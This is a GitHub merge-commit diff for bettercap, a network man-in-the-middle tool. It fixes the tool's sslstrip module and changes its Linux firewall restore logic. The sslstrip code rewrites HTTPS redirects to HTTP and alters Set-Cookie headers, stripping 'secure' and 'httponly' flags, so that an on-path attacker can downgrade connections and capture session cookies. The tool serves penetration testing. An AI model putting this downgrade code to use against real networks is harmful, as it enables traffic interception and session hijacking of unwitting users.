Merge pull request #1085 from SkyperTHC/master

Fix sslstrip, and do not restore iptables/ip_forward settings on exit when bettercap did not change them.
This commit is contained in:
Simone Margaritelli 2024-08-08 13:02:15 +02:00 committed by GitHub
commit 06623ddfb9
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
2 changed files with 31 additions and 12 deletions

View file

@ -16,6 +16,7 @@ import (
type LinuxFirewall struct { type LinuxFirewall struct {
iface *network.Endpoint iface *network.Endpoint
forwarding bool forwarding bool
restore bool
redirections map[string]*Redirection redirections map[string]*Redirection
} }
@ -28,6 +29,7 @@ func Make(iface *network.Endpoint) FirewallManager {
firewall := &LinuxFirewall{ firewall := &LinuxFirewall{
iface: iface, iface: iface,
forwarding: false, forwarding: false,
restore: false,
redirections: make(map[string]*Redirection), redirections: make(map[string]*Redirection),
} }
@ -72,6 +74,7 @@ func (f LinuxFirewall) EnableForwarding(enabled bool) error {
return f.enableFeature(IPV6ForwardingFile, enabled) return f.enableFeature(IPV6ForwardingFile, enabled)
} }
f.restore = true
return nil return nil
} }
@ -156,6 +159,9 @@ func (f *LinuxFirewall) EnableRedirection(r *Redirection, enabled bool) error {
} }
func (f LinuxFirewall) Restore() { func (f LinuxFirewall) Restore() {
if f.restore == false {
return
}
for _, r := range f.redirections { for _, r := range f.redirections {
if err := f.EnableRedirection(r, false); err != nil { if err := f.EnableRedirection(r, false); err != nil {
fmt.Printf("%s", err) fmt.Printf("%s", err)

View file

@ -159,11 +159,12 @@ func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redi
return return
} }
func (s *SSLStripper) fixCookies(res *http.Response) { func (s *SSLStripper) fixCookiesInHeader(res *http.Response) {
origHost := res.Request.URL.Hostname() origHost := res.Request.URL.Hostname()
strippedHost := s.hosts.Strip(origHost) strippedHost := s.hosts.Strip(origHost /* unstripped */)
if strippedHost != nil && strippedHost.Hostname != origHost && res.Header["Set-Cookie"] != nil { if strippedHost != nil && /*strippedHost.Hostname != origHost && */res.Header["Set-Cookie"] != nil {
// origHost is being tracked.
// get domains from hostnames // get domains from hostnames
if origParts, strippedParts := strings.Split(origHost, "."), strings.Split(strippedHost.Hostname, "."); len(origParts) > 1 && len(strippedParts) > 1 { if origParts, strippedParts := strings.Split(origHost, "."), strings.Split(strippedHost.Hostname, "."); len(origParts) > 1 && len(strippedParts) > 1 {
origDomain := origParts[len(origParts)-2] + "." + origParts[len(origParts)-1] origDomain := origParts[len(origParts)-2] + "." + origParts[len(origParts)-1]
@ -171,12 +172,13 @@ func (s *SSLStripper) fixCookies(res *http.Response) {
log.Info("[%s] Fixing cookies on %s", tui.Green("sslstrip"), tui.Bold(strippedHost.Hostname)) log.Info("[%s] Fixing cookies on %s", tui.Green("sslstrip"), tui.Bold(strippedHost.Hostname))
cookies := make([]string, len(res.Header["Set-Cookie"])) cookies := make([]string, len(res.Header["Set-Cookie"]))
// replace domain and strip "secure" flag for each cookie // replace domain= and strip "secure" flag for each cookie
for i, cookie := range res.Header["Set-Cookie"] { for i, cookie := range res.Header["Set-Cookie"] {
domainIndex := domainCookieParser.FindStringIndex(cookie) domainIndex := domainCookieParser.FindStringIndex(cookie)
if domainIndex != nil { if domainIndex != nil {
cookie = cookie[:domainIndex[0]] + strings.Replace(cookie[domainIndex[0]:domainIndex[1]], origDomain, strippedDomain, 1) + cookie[domainIndex[1]:] cookie = cookie[:domainIndex[0]] + strings.Replace(cookie[domainIndex[0]:domainIndex[1]], origDomain, strippedDomain, 1) + cookie[domainIndex[1]:]
} }
cookie = strings.Replace(cookie, "https://", "http://", -1)
cookies[i] = flagsCookieParser.ReplaceAllString(cookie, "") cookies[i] = flagsCookieParser.ReplaceAllString(cookie, "")
} }
res.Header["Set-Cookie"] = cookies res.Header["Set-Cookie"] = cookies
@ -222,18 +224,28 @@ func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
newURL := location.String() newURL := location.String()
// are we getting redirected from http to https? // are we getting redirected from http to https?
if orig.Scheme == "http" && location.Scheme == "https" { // orig.Scheme is set to "https" during Process->REQUEST above. Can not check it.
// if orig.Scheme == "http" && location.Scheme == "https" {
if location.Scheme == "https" {
log.Info("[%s] Got redirection from HTTP to HTTPS: %s -> %s", tui.Green("sslstrip"), tui.Yellow("http://"+origHost), tui.Bold("https://"+newHost)) log.Info("[%s] Got redirection from HTTP to HTTPS: %s -> %s", tui.Green("sslstrip"), tui.Yellow("http://"+origHost), tui.Bold("https://"+newHost))
// strip the URL down to an alternative HTTP version and save it to an ASCII Internationalized Domain Name // strip the URL down to an alternative HTTP version and save it to an ASCII Internationalized Domain Name
strippedURL := s.stripURL(newURL) strippedURL := s.stripURL(newURL)
parsed, _ := url.Parse(strippedURL) parsed, _ := url.Parse(strippedURL)
hostStripped := parsed.Hostname() if parsed.Port() == "443" || parsed.Port() == "" {
hostStripped, _ = idna.ToASCII(hostStripped) if parsed.Port() == "443" {
s.hosts.Track(newHost, hostStripped) // Check for badly formatted "Location: https://domain.com:443/"
// Prevent stripping to "Location: http://domain.com:443/"
// and instead strip to "Location: http://domain.com/"
strippedURL = strings.Replace(strippedURL, ":443", "", 1)
}
hostStripped := parsed.Hostname()
hostStripped, _ = idna.ToASCII(hostStripped)
s.hosts.Track(newHost, hostStripped)
res.Header.Set("Location", strippedURL) res.Header.Set("Location", strippedURL)
}
} }
} }
} }
@ -283,13 +295,14 @@ func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
res.Header.Set("Content-Length", strconv.Itoa(len(body))) res.Header.Set("Content-Length", strconv.Itoa(len(body)))
// fix cookies domain + strip "secure" + "httponly" flags
s.fixCookies(res)
// reset the response body to the original unread state // reset the response body to the original unread state
// but with just a string reader, this way further calls // but with just a string reader, this way further calls
// to ioutil.ReadAll(res.Body) will just return the content // to ioutil.ReadAll(res.Body) will just return the content
// we stripped without downloading anything again. // we stripped without downloading anything again.
res.Body = ioutil.NopCloser(strings.NewReader(body)) res.Body = ioutil.NopCloser(strings.NewReader(body))
} }
// fix cookies domain + strip "secure" + "httponly" flags
// 302/Location redirect might set cookies as well. Always try to fix Cookies
s.fixCookiesInHeader(res)
} }